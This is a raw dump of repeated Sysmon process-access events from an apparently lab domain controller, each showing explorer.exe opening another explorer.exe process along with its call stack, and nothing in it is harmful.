22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696585Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696584Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696583Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696582Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696581Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696580Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696579Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696578Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696577Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696576Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696575Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696574Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696573Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696572Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696571Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696570Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696569Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696568Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696567Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696566Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696565Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 